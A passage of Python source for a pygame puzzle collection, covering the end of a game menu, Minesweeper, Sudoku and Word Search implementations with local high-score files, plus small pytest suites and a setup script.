if (x <= scale * 14 and x >= scale * 10) and (y >= scale * 7 + quarterS and y <= scale * 9 - quarterS):
chText = black
chBack = white
chBorder = 2
playCh = True
# Reset visual changes in button clicks
else:
sudText = white
sudBack = black
sudBorder = 0
if playSud:
self.playSudoku()
pygame.display.set_caption('Puzzle Pack')
screen = pygame.display.set_mode((width, height))
playSud = False
wordText = white
wordBack = black
wordBorder = 0
if playWord:
self.playWordSearch()
pygame.display.set_caption('Puzzle Pack')
screen = pygame.display.set_mode((width, height))
playWord = False
mineText = white
mineBack = black
mineBorder = 0
if playMine:
self.playMinesweeper()
pygame.display.set_caption('Puzzle Pack')
screen = pygame.display.set_mode((width, height))
playMine = False
chText = white
chBack = black
chBorder = 0
if playCh:
self.playChess()
pygame.display.set_caption('Puzzle Pack')
screen = pygame.display.set_mode((width, height))
playCh = False
frames += 1
clock.tick(60)
pygame.display.update()
# Displaying everything on the screen
screen.fill(white)
screen.blit(image, (0, 0))
# Sudoku button
sud = font.render("SUDOKU", True, sudText, sudBack)
sudRect = sud.get_rect()
sudRect.center = (scale * 12, scale * 2)
pygame.draw.rect(screen, black, [scale * 10, scale + quarterS, scale * 4, scale * 2 - halfS], sudBorder)
screen.blit(sud, sudRect)
# Word search button
word = font.render("WORD SEARCH", True, wordText, wordBack)
wordRect = word.get_rect()
wordRect.center = (scale * 12, scale * 4)
pygame.draw.rect(screen, black, [scale * 10, scale * 3 + quarterS, scale * 4, scale * 2 - halfS], wordBorder)
screen.blit(word, wordRect)
# Minesweeper button
mine = font.render("MINESWEEPER", True, mineText, mineBack)
mineRect = mine.get_rect()
mineRect.center = (scale * 12, scale * 6)
pygame.draw.rect(screen, black, [scale * 10, scale * 5 + quarterS, scale * 4, scale * 2 - halfS], mineBorder)
screen.blit(mine, mineRect)
# Chess puzzle button
ch = font.render("CHESS", True, chText, chBack)
chRect = ch.get_rect()
chRect.center = (scale * 12, scale * 8)
pygame.draw.rect(screen, black, [scale * 10, scale * 7 + quarterS, scale * 4, scale * 2 - halfS], chBorder)
screen.blit(ch, chRect)
frames += 1
clock.tick(60)
pygame.display.update()
#pygame.display.update()
pygame.quit()
game = Menu()
game.chooseGame()
--- FILE SEPARATOR ---
import pygame
import time
import sys
from typing import List
import random
import numpy as np
pygame.font.init()
WIDTH = 800
WHITE = (255, 255, 255)
BLACK = (0,0,0)
GREY = (128, 128, 128)
RED = (255, 0, 0)
PURPLE = (255, 175, 255)
LIGHT_RED = (255, 175, 175)
ORANGE = (255, 200, 145)
GAP_SIZE = 1
SCALE = 40
font = pygame.font.SysFont('timesnewroman.ttc', 42)
small_font = pygame.font.SysFont('consola', 32)
class Square:
def __init__(self, x, y, size):
self.x = x
self.y = y
self.size = size
self.fontsize = 42
self.font = pygame.font.SysFont('timesnewroman.ttc', self.fontsize)
self.revealed = False
self.color = GREY
self.mark = False
def setValue(self, n):
self.value = n
if n == 0:
self.img = font.render(" ", True, BLACK)
else:
self.img = font.render(str(self.value), True, BLACK)
def getValue(self):
return self.value
def reveal(self):
self.revealed = True
self.color = WHITE
if self.value == -1:
return False
return True
def draw(self, WIN):
pygame.draw.rect(WIN, self.color, (self.x + GAP_SIZE, self.y + GAP_SIZE + SCALE, self.size - GAP_SIZE*2, self.size - GAP_SIZE*2))
if self.revealed:
WIN.blit(self.img, (self.x + self.size/2 - 7, (self.y + self.size/2 - 13) + SCALE))
elif self.mark:
pygame.draw.circle(WIN, RED, (self.x + self.size/2, self.y + self.size/2 + SCALE), 15)
class Board:
def __init__(self, rows, cols, bombs):
self.lose = False
self.win = False
font = pygame.font.SysFont('timesnewroman.ttc', 150)
self.lossimg = font.render('YOU LOSE', True, BLACK)
self.winimg = font.render('YOU WIN', True, BLACK)
size = WIDTH//rows
self.board: List[List[Square]] = [[Square(j*size, i*size, size) for j in range(cols)] for i in range(rows)]
numSquares = rows*cols
self.cols = cols
self.rows = rows
rand = np.zeros((1, numSquares - bombs))
rand = np.concatenate((rand, -1 * np.ones((1, bombs))), axis = None)
random.shuffle(rand)
rand = rand.astype(int)
for i in range(len(rand)):
row = int(i / rows)
col = i % cols
self.board[row][col].setValue(rand[i])
def setSquares(self):
for x in range(self.cols):
for y in range(self.rows):
if (self.board[x][y].getValue() != -1):
self.board[x][y].setValue(self.checkBombs(x,y))
def checkBombs(self, x, y):
value = 0
for i in range(-1,2):
if(x == 0 and i == -1): continue #Boundry Case
elif (x == self.cols - 1 and i == 1): continue #Boundry Case
for j in range(-1,2):
if(y == 0 and j == -1): continue #Boundry Case
elif(y == self.rows - 1 and j == 1): continue #Boundry Case
if (i == 0 and j ==0): continue #Bomb Tile
elif(self.board[x+i][y+j].getValue() == -1):
value += 1
return value
def printBoard(self):
for List in self.board:
for Square in List:
print(Square.getValue() , end = "")
print(", " , end = "")
print()
def getSquare(self, x, y):
return self.board[x][y]
def draw(self, WIN):
if self.lose:
WIN.blit(self.lossimg, (150, WIDTH/2 -100))
elif self.win:
WIN.blit(self.winimg, (150, WIDTH/2 -100))
class Minesweeper:
numFlags = 0
revealedSquares = 0
def __init__(self):
#rows = int(input("How many rows? "))
rows = 20
self.rows = rows
cols = rows
#bombs = int(input("How many bombs? "))
self.bombs = 60
self.total = rows*cols - self.bombs
self.board = Board(rows, cols, self.bombs)
self.board.setSquares()
def reveal(self, x, y): # take in clicked tile as parameter
self.revealedSquares += 1
curr = self.board.getSquare(x,y)
if(curr.getValue() != 0):
curr.reveal()
return
curr.reveal()
for i in range(-1,2):
if(x + i < 0):continue #Boundry Case
elif (x + i == self.board.rows): continue #Boundry Case
for j in range(-1,2):
if(y + j < 0):continue #Boundry Case
elif (y + j == self.board.cols): continue #Boundry Case
curr = self.board.getSquare(x + i, y + j)
if(curr.revealed):
continue
self.reveal(x + i, y + j)
def findNode(self, pos, rows):
x,y = pos
squareSize = WIDTH//rows
row = (y - SCALE) // squareSize
col = x // squareSize
return [row,col]
def update_display(self, board, WIN):
for row in board.board:
for square in row:
square.draw(WIN)
if board.lose:
board.draw(WIN)
if board.win:
board.draw(WIN)
pygame.display.update()
def playGame(self):
score_file = open("ms_high_score.txt", "r")
score = score_file.read().splitlines() # read in the best time/high score
score_file.close()
HEIGHT = WIDTH + (SCALE * 2)
WIN = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Minesweeper")
frames = 0
minutes = 0
seconds = 0
total_seconds = 0
clock = pygame.time.Clock()
running = True
while running:
if not self.board.lose and not self.board.win:
total_seconds = frames // 60
minutes = total_seconds // 60
seconds = total_seconds % 60
time = "{0:02}:{1:02}".format(minutes, seconds)
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
pygame.quit()
elif event.type == pygame.MOUSEBUTTONDOWN:
pos = pygame.mouse.get_pos()
tempCol = pos[0] // SCALE
tempRow = (pos[1] - SCALE) // SCALE
if event.button == 1:
if (tempCol < 20 and tempCol >= 0) and (tempRow < 20 and tempRow >= 0):
[x,y] = self.findNode(pos, self.rows)
x = int(x)
y = int(y)
clicked = self.board.board[x][y]
if clicked.revealed == False and self.board.lose == False and self.board.win == False:
if clicked.reveal() == False:
self.board.lose = True
self.reveal(x, y)
if self.revealedSquares == self.total:
self.board.win = True
if (pos[0] < WIDTH // 2 and pos[0] >= 0) and (pos[1] < SCALE and pos[1] >= 0):
self.numFlags = 0
self.revealedSquares = 0
rows = 20
self.rows = rows
cols = rows
self.cols = rows
self.bombs = 60
self.total = rows*cols - self.bombs
self.board = Board(rows, cols, self.bombs)
self.board.setSquares()
frames = 0
minutes = 0
seconds = 0
total_seconds = 0
if (pos[0] < WIDTH and pos[0] >= 0) and (pos[1] < HEIGHT and pos[1] >= 21 * SCALE):
running = False
if event.button == 3 and self.board.lose == False and self.board.win == False:
[x,y] = self.findNode(pos, self.rows)
x = int(x)
y = int(y)
clicked = self.board.board[x][y]
if clicked.revealed == False:
if clicked.mark == False and self.numFlags < self.bombs:
clicked.mark = True
self.numFlags += 1
elif clicked.mark:
clicked.mark = False
self.numFlags -= 1
# Visual change for buttons being clicked
else:
pygame.display.update()
frames += 1
clock.tick(60)
# Buttons
# New game button
new = small_font.render("NEW GAME", True, BLACK, LIGHT_RED)
newRect = new.get_rect()
newRect.center = (WIDTH // 4, SCALE // 2)
pygame.draw.rect(WIN, LIGHT_RED, [0, 0, WIDTH // 2, SCALE])
WIN.blit(new, newRect)
# Timer
timer = small_font.render(time, True, BLACK, ORANGE)
timerRect = timer.get_rect()
timerRect.center = (3 * (WIDTH // 4), SCALE // 2)
pygame.draw.rect(WIN, ORANGE, [WIDTH // 2, 0, WIDTH // 2, SCALE])
WIN.blit(timer, timerRect)
# Back to menu button
menu = small_font.render("BACK TO MENU", True, BLACK, PURPLE)
menuRect = menu.get_rect()
menuRect.center = (WIDTH // 2, (21 * SCALE) + (SCALE // 2))
pygame.draw.rect(WIN, PURPLE, [0, 21 * SCALE, WIDTH, SCALE])
WIN.blit(menu, menuRect)
if self.board.win:
text = "{0:02}:{1:02}".format(int(score[0]), int(score[1]))
if int(score[0]) > minutes or (int(score[0]) >= minutes and int(score[1]) > seconds):
with open("ms_high_score.txt", "w") as out:
out.write("{}\n{}".format(str(minutes), str(seconds)))
text = "{0:02}:{1:02}".format(minutes, seconds)
score_file.close()
time = "Puzzle complete! Best time: " + text
frames += 1
clock.tick(60)
pygame.display.update()
self.update_display(self.board, WIN)
--- FILE SEPARATOR ---
# Test suite for minesweeper game
import pytest
import minesweeper
@pytest.fixture
def getMinesweeper():
return minesweeper.Minesweeper()
def test_reveal(getMinesweeper):
x = 1
y = 1
result = getMinesweeper.board.board[x][y].reveal()
expected = True
assert result == expected
def test_find_node(getMinesweeper):
x = 0
y = 0
rows = getMinesweeper.rows
result = getMinesweeper.findNode([x, y], rows)
expected = [0,0]
assert result == expected
--- FILE SEPARATOR ---
from setuptools import setup, find_packages
setup(name="PuzzlePack", packages=find_packages())
--- FILE SEPARATOR ---
# Sudoku class
import random
import numpy as np
import pygame
import copy
import sys
# Needs to fill the board up following Sudoku rules
# Remove a number and check if the board still has just one unique solution
# Do this using a fact backtracking algorithm
# If there is now more than one solution, don't remove this number, try another
class Sudoku:
def __init__(self):
self.size = 36
self.numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9]
self.solutions = 0
self.answer = np.zeros([9, 9], dtype=np.int32)
def printClass(self):
return "This is the Sudoku class."
# Check if there is just one solution to the board
def checkRemove(self, board, optBoard):
if self.solutions > 1:
return False
if np.all(num > 0 for num in board):
self.solutions += 1
optBoard = self.getOptBoard(board, optBoard)
lowPair = self.findLowOpt(optBoard)
x, y = lowPair
options = optBoard[x][y]
for nums in options:
if len(options) > 0:
board[x][y] = num
sys.setrecursionlimit(2600)
if self.checkRemove(board, optBoard):
return True
board[x][y] = 0
if self.solutions == 1:
return True
return False
# Remove a number from the board
def removeNum(self, x, y, board, optBoard):
board[x][y] = 0
self.solutions = 0
if self.checkRemove(board, optBoard):
return board
else:
locX = random.randint(0, 8)
locY = random.randint(0, 8)
return self.removeNum(locX, locY, board, optBoard)
# Recursive backtracking algorithm to fill the board all the way
# following sudoku rules
def fillBoard(self, x, y, board):
if y >= 9 and x < 8:
x += 1
y = 0
if x >= 8 and y >= 9:
return True
options = self.getOpts(x, y, board)
random.shuffle(options)
for num in options:
if len(options) > 0:
board[x][y] = num
sys.setrecursionlimit(2600)
if self.fillBoard(x, y+1, board):
return True
board[x][y] = 0
return False
def getOpts(self, x, y, board):
row = board[x, :]
col = board[:, y]
cell = self.getCell(x, y, board)
nonOpts = np.union1d(row, col)
nonOpts = np.union1d(nonOpts, cell)
options = np.setdiff1d(self.numbers, nonOpts)
return options
def getOptBoard(self, board, optBoard):
for x in range(0, 9):
for y in range(0, 9):
optBoard[x][y] = self.getOpts(x, y, board)
return optBoard
def findLowOpt(self, optBoard):
row = -1
col = -1
lowest = 9
lowPair = (row, col)
for x in range(0, 9):
for y in range(0, 9):
if len(optBoard[x][y]) < lowest:
lowest = len(optBoard[x][y])
lowPair = (x, y)
return lowPair
def getCell(self, x, y, board):
cell = np.zeros([0], dtype=np.int32)
# Cell 1
if(x >= 0 and x <= 2 and y >= 0 and y <= 2):
cell = np.concatenate((cell, board[0, 0:3]))
cell = np.concatenate((cell, board[1, 0:3]))
cell = np.concatenate((cell, board[2, 0:3]))
# Cell 2
elif(x >= 3 and x <= 5 and y >= 0 and y <= 2):
cell = np.concatenate((cell, board[3, 0:3]))
cell = np.concatenate((cell, board[4, 0:3]))
cell = np.concatenate((cell, board[5, 0:3]))
# Cell 3
elif(x >= 6 and x <= 8 and y >= 0 and y <= 2):
cell = np.concatenate((cell, board[6, 0:3]))
cell = np.concatenate((cell, board[7, 0:3]))
cell = np.concatenate((cell, board[8, 0:3]))
# Cell 4
elif(x >= 0 and x <= 2 and y >= 3 and y <= 5):
cell = np.concatenate((cell, board[0, 3:6]))
cell = np.concatenate((cell, board[1, 3:6]))
cell = np.concatenate((cell, board[2, 3:6]))
# Cell 5
elif(x >= 3 and x <= 5 and y >= 3 and y <= 5):
cell = np.concatenate((cell, board[3, 3:6]))
cell = np.concatenate((cell, board[4, 3:6]))
cell = np.concatenate((cell, board[5, 3:6]))
# Cell 6
elif(x >= 6 and x <= 8 and y >= 3 and y <= 5):
cell = np.concatenate((cell, board[6, 3:6]))
cell = np.concatenate((cell, board[7, 3:6]))
cell = np.concatenate((cell, board[8, 3:6]))
# Cell 7
elif(x >= 0 and x <= 2 and y >= 6 and y <= 8):
cell = np.concatenate((cell, board[0, 6:9]))
cell = np.concatenate((cell, board[1, 6:9]))
cell = np.concatenate((cell, board[2, 6:9]))
# Cell 8
elif(x >= 3 and x <= 5 and y >= 6 and y <= 8):
cell = np.concatenate((cell, board[3, 6:9]))
cell = np.concatenate((cell, board[4, 6:9]))
cell = np.concatenate((cell, board[5, 6:9]))
# Cell 9
elif(x >= 6 and x <= 8 and y >= 6 and y <= 8):
cell = np.concatenate((cell, board[6, 6:9]))
cell = np.concatenate((cell, board[7, 6:9]))
cell = np.concatenate((cell, board[8, 6:9]))
return cell
# Set up the board and begin the algorithm
def generateGame(self):
board = np.zeros([9, 9], dtype=np.int32)
# Fill the array with -'s as placeholders
for row in range(0, 9):
for col in range(0, 9):
board[row][col] = 0
x = 0
y = 0
self.fillBoard(x, y, board)
self.answer = copy.deepcopy(board)
optBoard = np.zeros([9, 9], dtype=object)
optBoard = self.getOptBoard(board, optBoard)
for i in range(0, 45):
locX = random.randint(0, 8)
locY = random.randint(0, 8)
self.removeNum(locX, locY, board, optBoard)
return board
def playGame(self):
board = self.generateGame()
temp = copy.deepcopy(board)
score_file = open("sudoku_high_score.txt", "r")
score = score_file.read().splitlines() # read in the best time/high score
score_file.close()
# Pygame initializations
pygame.init()
pygame.display.set_caption('Sudoku Game')
scale = 50
width = scale * 9
height = scale * 11
twiceS = scale * 2
halfS = scale // 2
halfW = width // 2
quarterW = width // 4
eighthW = width // 8
running = True
win = False
frames = 0
minutes = 0
seconds = 0
total_seconds = 0
screen = pygame.display.set_mode((width, height))
clock = pygame.time.Clock()
font = pygame.font.SysFont("consola", 40)
small_font = pygame.font.SysFont("consola", 24)
# Colors
white = (255, 255, 255)
grey = (200, 200, 200)
dark_grey = (175, 175, 175)
black = (0, 0, 0)
light_red = (255, 175, 175)
dark_red = (230, 150, 150)
light_orange = (255, 200, 145)
light_yellow = (255, 255, 200)
light_green = (200, 255, 200)
light_blue = (200, 200, 255)
dark_blue = (175, 175, 230)
light_purple = (255, 175, 255)
light_pink = (255, 200, 200)
light_brown = (200, 150, 100)
# Default colors
number_color = white
select_color = grey
check_color = grey
clear_color = light_blue
new_color = light_red
# Textbox input
active = False
text = ""
selX = -1
selY = -1
selected = (selX, selY)
checked = False
correct = 0
while running:
# Variables for calculating time
if not win:
total_seconds = frames // 60
minutes = total_seconds // 60
seconds = total_seconds % 60
time = "{0:02}:{1:02}".format(minutes, seconds)
# Actions/events from input
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
pygame.quit()
elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
# User clicks the mouse. Get the position
pos = pygame.mouse.get_pos()
# Change the x/y screen coordinates to grid coordinates
column = pos[0] // scale
row = (pos[1] - scale) // scale
selY = column
selX = row
# Action for numbers being selected
if (column < 9 and column >= 0) and (row < 9 and row >= 0) and not win and board[selX][selY] == 0:
active = True
if (selX, selY) != selected:
selected = (selX, selY)
else:
selected = (-1, -1)
else:
active = False
selected = (-1, -1)
# Action for check numbers buttton pressed
if (pos[0] < quarterW and pos[0] >= 0) and (pos[1] < scale and pos[1] >= 0) and not win:
check_color = dark_grey
checked = True
selected = (-1, -1)
# Action for clear all buttton pressed
if (pos[0] < halfW and pos[0] >= quarterW) and (pos[1] < scale and pos[1] >= 0) and not win:
clear_color = dark_blue
temp = copy.deepcopy(board)
correct = 0
checked = False
# Action for new game button; resets all variables, game board, etc.
if (pos[0] < quarterW * 3 and pos[0] >= halfW) and (pos[1] < scale and pos[1] >= 0):
win = False
board = self.generateGame()
temp = copy.deepcopy(board)
score_file = open("sudoku_high_score.txt", "r")
score = score_file.read().splitlines() # read in the best time/high score
score_file.close()
frames = 0
minutes = 0
seconds = 0
total_seconds = 0
selected = (-1, -1)
active = False
text = ""
new_color = dark_red
checked = False
correct = 0
# Action for back to menu button
if (pos[0] < width and pos[0] >= 0) and (pos[1] < height and pos[1] >= scale * 10):
running = False
elif event.type == pygame.KEYDOWN:
if active:
if event.key == pygame.K_RETURN:
text = ''
elif event.key == pygame.K_BACKSPACE:
text = text[:-1]
else:
text = event.unicode
if board[selX][selY] == 0:
temp[selX][selY] = int(text)
text = ""
active = False
selected = (-1, -1)
# Visual change for buttons being clicked
else:
check_color = grey
clear_color = light_blue
new_color = light_red
pygame.display.update()
frames += 1
clock.tick(60)
# Displaying everything on the screen
screen.fill(white)
# Display the board
for row in range(0, 9):
for col in range(0, 9):
if (row, col) == selected:
number_color = light_yellow
elif checked:
if temp[row][col] == self.answer[row][col]:
number_color = light_green
correct += 1
else:
number_color = light_red
elif temp[row][col] != 0 and board[row][col] == 0:
number_color = select_color
else:
number_color = white
num = str(temp[row][col])
if temp[row][col] == 0:
num = " "
number = font.render(num, True, black, number_color)
numberRect = number.get_rect()
numberRect.center = (col * scale + halfS, row * scale + (scale + halfS))
pygame.draw.rect(screen, number_color, [scale * col, scale * row + scale, scale, scale])
screen.blit(number, numberRect)
# Box borders
pygame.draw.rect(screen, black, [scale * col, scale * row + scale, scale, scale], width=1)
# 3x3 cell borders
pygame.draw.rect(screen, black, [(scale * 3), scale-1, (scale * 3)+1, (scale * 9)+1], width=2)
pygame.draw.rect(screen, black, [0-1, (scale * 4), (scale * 9)+1, (scale * 3)+1], width=2)
# Check word and clear buttons
check = small_font.render("CHECK", True, black, check_color)
answer = small_font.render("ANSWER", True, black, check_color)
checkRect = check.get_rect()
checkRect.center = (eighthW, halfS // 1.5)
answerRect = answer.get_rect()
answerRect.center = (eighthW, halfS + (halfS // 2))
pygame.draw.rect(screen, check_color, [0, 0, quarterW, scale])
screen.blit(check, checkRect)
screen.blit(answer, answerRect)
clear = small_font.render("CLEAR", True, black, clear_color)
allWord = small_font.render("ALL", True, black, clear_color)
clearRect = clear.get_rect()
clearRect.center = (3 * (eighthW), halfS // 1.5)
allRect = allWord.get_rect()
allRect.center = (3 * (eighthW), halfS + (halfS // 2))
pygame.draw.rect(screen, clear_color, [quarterW, 0, halfW, scale])
screen.blit(clear, clearRect)
screen.blit(allWord, allRect)
# New game button and timer
new = small_font.render("NEW", True, black, new_color)
gameWord = small_font.render("GAME", True, black, new_color)
newRect = new.get_rect()
newRect.center = (5 * (eighthW), halfS // 1.5)
gameRect = gameWord.get_rect()
gameRect.center = (5 * (eighthW), halfS + (halfS // 2))
pygame.draw.rect(screen, new_color, [halfW, 0, quarterW * 3, scale])
screen.blit(new, newRect)
screen.blit(gameWord, gameRect)
timer = font.render(time, True, black, light_orange)
timerRect = timer.get_rect()
timerRect.center = (7 * (eighthW), halfS)
pygame.draw.rect(screen, light_orange, [quarterW * 3, 0, width, scale])
screen.blit(timer, timerRect)
# Back to menu button
menu = small_font.render("BACK TO MENU", True, black, light_purple)
menuRect = menu.get_rect()
menuRect.center = (width // 2, (10 * scale) + (scale // 2))
pygame.draw.rect(screen, light_purple, [0, 10 * scale, width, scale])
screen.blit(menu, menuRect)
# Win condition
if np.all(temp == self.answer):
win = True
text = "{0:02}:{1:02}".format(int(score[0]), int(score[1]))
if int(score[0]) > minutes or (int(score[0]) >= minutes and int(score[1]) > seconds):
with open("sudoku_high_score.txt", "w") as out:
out.write("{}\n{}".format(str(minutes), str(seconds)))
text = "{0:02}:{1:02}".format(minutes, seconds)
score_file.close()
complete = small_font.render("Puzzle complete! Best time: " + text, True, black, light_orange)
completeRect = complete.get_rect()
completeRect.center = (width // 2, (10 * scale) + (scale // 2))
pygame.draw.rect(screen, light_orange, [0, 10 * scale, width, height])
screen.blit(complete, completeRect)
frames += 1
clock.tick(60)
pygame.display.update()
--- FILE SEPARATOR ---
# Test suite for Sudoku game
import pytest
import numpy as np
import sudoku
@pytest.fixture
def getSudoku():
return sudoku.Sudoku()
# Arrange, get a blank board
@pytest.fixture
def getBoard(getSudoku):
board = np.zeros([9, 9], dtype=np.int32)
# Fill the array with -'s as placeholders
for row in range(0, 9):
for col in range(0, 9):
board[row][col] = 0
return board
# Arrange, get a filled board
@pytest.fixture
def getTestBoard(getSudoku):
board = np.zeros([9, 9], dtype=np.int32)
temp = [[9, 7, 8, 1, 3, 2, 4, 5, 6],
[4, 1, 5, 6, 8, 9, 3, 2, 7],
[2, 3, 6, 5, 7, 4, 1, 9, 8],
[7, 6, 2, 4, 5, 8, 9, 3, 1],
[1, 4, 3, 9, 6, 7, 2, 8, 5],
[8, 5, 9, 3, 2, 1, 7, 6, 4],
[5, 2, 7, 8, 1, 3, 6, 4, 9],
[6, 9, 1, 2, 4, 5, 8, 7, 3],
[3, 8, 4, 7, 9, 6, 5, 1, 2]]
# Fill the array with -'s as placeholders
for row in range(0, 9):
for col in range(0, 9):
board[row][col] = temp[row][col]
return board
# Arrange, get a blank board
@pytest.fixture
def getTestOptBoard(getSudoku):
board = np.zeros([9, 9], dtype=object)
# Fill the array with -'s as placeholders
for row in range(0, 9):
for col in range(0, 9):
board[row][col] = np.zeros([1], dtype=np.int32)
return board
def test_printClass(getSudoku):
result = getSudoku.printClass()
test = "This is the Sudoku class."
assert result == test
def test_checkRemove(getSudoku, getTestBoard, getTestOptBoard):
result = getSudoku.checkRemove(getTestBoard, getTestOptBoard)
assert result
def test_removeNum(getSudoku, getTestBoard, getTestOptBoard):
result = getSudoku.removeNum(0, 0, getTestBoard, getTestOptBoard)
test = getTestBoard
test[0][0] = 0
assert np.array_equal(result, test)
def test_fillBoard(getSudoku, getBoard):
temp = getBoard
getSudoku.fillBoard(0, 0, temp)
test = getBoard
for row in range(0, 9):
for col in range(0, 9):
assert temp[row][col] is not test[row][col]
def test_generateGame(getSudoku, getBoard):
result = getSudoku.generateGame()
test = getBoard
for row in range(0, 9):
for col in range(0, 9):
assert result[row][col] is not test[row][col]
--- FILE SEPARATOR ---
# Word search class
import random
import numpy as np
import pygame
import copy
import sys
class WordSearch:
def __init__(self):
self.size = 17
self.numberOfWords = 25
self.letters = ["A", "B", "C", "D", "E",
"F", "G", "H", "I", "J",
"K", "L", "M", "N", "O",
"P", "Q", "R", "S", "T",
"U", "V", "W", "X", "Y", "Z"]
self.textFile = open("words.txt", "r")
self.wordsList = self.textFile.read().splitlines()
self.usedWords = []
self.directions = ["NW", "N", "NE",
"W", "E",
"SW", "S", "SE"]
def printClass(self):
return "This is the word search class."
def checkWord(self, word, x, y, dir, board):
if word in self.usedWords:
return False
for i in range(0, len(word)):
if (dir == "NW" and (board[x-i][y-i] == "-" or board[x-i][y-i] == word[i:i+1]) and
x - len(word) > 0 and y - len(word) > 0):
continue
elif (dir == "N" and (board[x][y-i] == "-" or board[x][y-i] == word[i:i+1]) and
y - len(word) > 0):
continue
elif (dir == "NE" and (board[x+i][y-i] == "-" or board[x+i][y-i] == word[i:i+1]) and
x + len(word) < self.size and y - len(word) > 0):
continue
elif (dir == "W" and (board[x-i][y] == "-" or board[x-i][y] == word[i:i+1]) and
x - len(word) > 0):
continue
elif (dir == "E" and (board[x+i][y] == "-" or board[x+i][y] == word[i:i+1]) and
x + len(word) < self.size):
continue
elif (dir == "SW" and (board[x-i][y+i] == "-" or board[x-i][y+i] == word[i:i+1]) and
x - len(word) > 0 and y+ len(word) < self.size):
continue
elif (dir == "S" and (board[x][y+i] == "-" or board[x][y+i] == word[i:i+1]) and
y + len(word) < self.size):
continue
elif (dir == "SE" and (board[x+i][y+i] == "-" or board[x+i][y+i] == word[i:i+1]) and
x + len(word) < self.size and y + len(word) < self.size):
continue
else:
return False
return True
def fillWord(self, word, x, y, dir, board):
for i in range(0, len(word)):
if dir == "NW":
board[x-i][y-i] = word[i:i+1]
elif dir == "N":
board[x][y-i] = word[i:i+1]
elif dir == "NE":
board[x+i][y-i] = word[i:i+1]
elif dir == "W":
board[x-i][y] = word[i:i+1]
elif dir == "E":
board[x+i][y] = word[i:i+1]
elif dir == "SW":
board[x-i][y+i] = word[i:i+1]
elif dir == "S":
board[x][y+i] = word[i:i+1]
elif dir == "SE":
board[x+i][y+i] = word[i:i+1]
return board
def addWord(self, word, x, y, dir, board):
if self.checkWord(word, x, y, dir, board):
# print(word)
self.usedWords.append(word)
return self.fillWord(word, x, y, dir, board)
else:
word = random.choice(self.wordsList)
locX = random.randint(0, self.size - 1)
locY = random.randint(0, self.size - 1)
direction = random.choice(self.directions)
return self.addWord(word, locX, locY, direction, board)
def generateGame(self):
board = np.zeros([self.size, self.size], dtype=str)
# Fill the array with -'s as placeholders
for row in range(0, self.size):
for col in range(0, self.size):
board[row][col] = "-"
# Generate all words on the board
for n in range(0, self.numberOfWords):
word = random.choice(self.wordsList)
locX = random.randint(0, self.size - 1)
locY = random.randint(0, self.size - 1)
direction = random.choice(self.directions)
self.addWord(word, locX, locY, direction, board)
return board
def checkSelection(self, board, selected):
selected.sort()
tempFor = ""
tempBack = ""
for i in selected:
row = i[1]
col = i[0]
if board[row][col] == "-":
return False
tempFor += (board[row][col])
for x in range(0, len(tempFor)):
tempBack += tempFor[len(tempFor)-x-1]
if tempFor in self.usedWords:
return tempFor
elif tempBack in self.usedWords:
return tempBack
else:
return ""
def clearSelection(self, selected):
selected.clear()
def playGame(self):
a = self.generateGame()
board = copy.deepcopy(a)
score_file = open("ws_high_score.txt", "r")
score = score_file.read().splitlines() # read in the best time/high score
score_file.close()
# Pygame initializations
pygame.init()
pygame.display.set_caption('Word Search Game')
scale = 40
width = 17 * scale
height = 24 * scale
twice = scale * 2
half = scale // 2
halfW = width // 2
quarterW = width // 4
eighthW = width // 8
running = True
leftDrag = False
rightDrag = False
win = False
frames = 0
minutes = 0
seconds = 0
total_seconds = 0
screen = pygame.display.set_mode((width, height))
clock = pygame.time.Clock()
font = pygame.font.SysFont("consola", 32)
small_font = pygame.font.SysFont("consola", 28)
# Colors
white = (255, 255, 255)
grey = (200, 200, 200)
dark_grey = (175, 175, 175)
black = (0, 0, 0)
light_red = (255, 175, 175)
dark_red = (230, 150, 150)
light_orange = (255, 200, 145)
light_yellow = (255, 255, 200)
light_green = (200, 255, 200)
light_blue = (200, 200, 255)
dark_blue = (175, 175, 230)
light_purple = (255, 175, 255)
light_pink = (255, 200, 200)
light_brown = (200, 150, 100)
# Default colors
letter_color = white
word_color = white
check_color = grey
clear_color = light_blue
new_color = light_red
# Selection variables
selX = -1
selY = -1
selected = []
correct = []
correctLetters = []
while running:
# Variables for calculating time
if not win:
total_seconds = frames // 60
minutes = total_seconds // 60
seconds = total_seconds % 60
time = "{0:02}:{1:02}".format(minutes, seconds)
# Actions/events from input
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
pygame.quit()
# Events related to left click mouse down
elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
# User clicks the mouse. Get the position
pos = pygame.mouse.get_pos()
# Change the x/y screen coordinates to grid coordinates
column = pos[0] // scale
row = (pos[1] - scale) // scale
# Action for letters being selected
if (column < self.size and column >= 0) and (row < self.size and row >= 0) and not win:
leftDrag = True
selX = column
selY = row
if (selX, selY) not in selected:
selected.append((selX, selY))
# Action for check word buttton pressed
if (pos[0] < quarterW and pos[0] >= 0) and (pos[1] < scale and pos[1] >= 0) and not win:
check_color = dark_grey
if self.checkSelection(board, selected):
correct.append(self.checkSelection(board, selected))
for things in selected:
correctLetters.append(things)
self.clearSelection(selected)
# Action for clear word buttton pressed
if (pos[0] < halfW and pos[0] >= quarterW) and (pos[1] < scale and pos[1] >= 0) and not win:
clear_color = dark_blue
self.clearSelection(selected)
# Action for new game button; resets all variables, game board, etc.
if (pos[0] < quarterW * 3 and pos[0] >= halfW) and (pos[1] < scale and pos[1] >= 0):
win = False
score_file = open("ws_high_score.txt", "r")
score = score_file.read().splitlines() # read in the best time/high score
score_file.close()
self.usedWords = []
a = self.generateGame()
board = copy.deepcopy(a)
frames = 0
minutes = 0
seconds = 0
total_seconds = 0
selected = []
correct = []
correctLetters = []
new_color = dark_red
# Action for back to menu button
if (pos[0] < width and pos[0] >= 0) and (pos[1] < height and pos[1] >= 23 * scale):
running = False
# Events related to left click mouse up
elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:
leftDrag = False
# Events related to mouse drag/motion
elif event.type == pygame.MOUSEMOTION and leftDrag:
pos = pygame.mouse.get_pos()
# Change the x/y screen coordinates to grid coordinates
column = pos[0] // scale
row = (pos[1] - scale) // scale
if (column, row) not in selected:
selected.append((column, row))
# Events related to right click mouse down
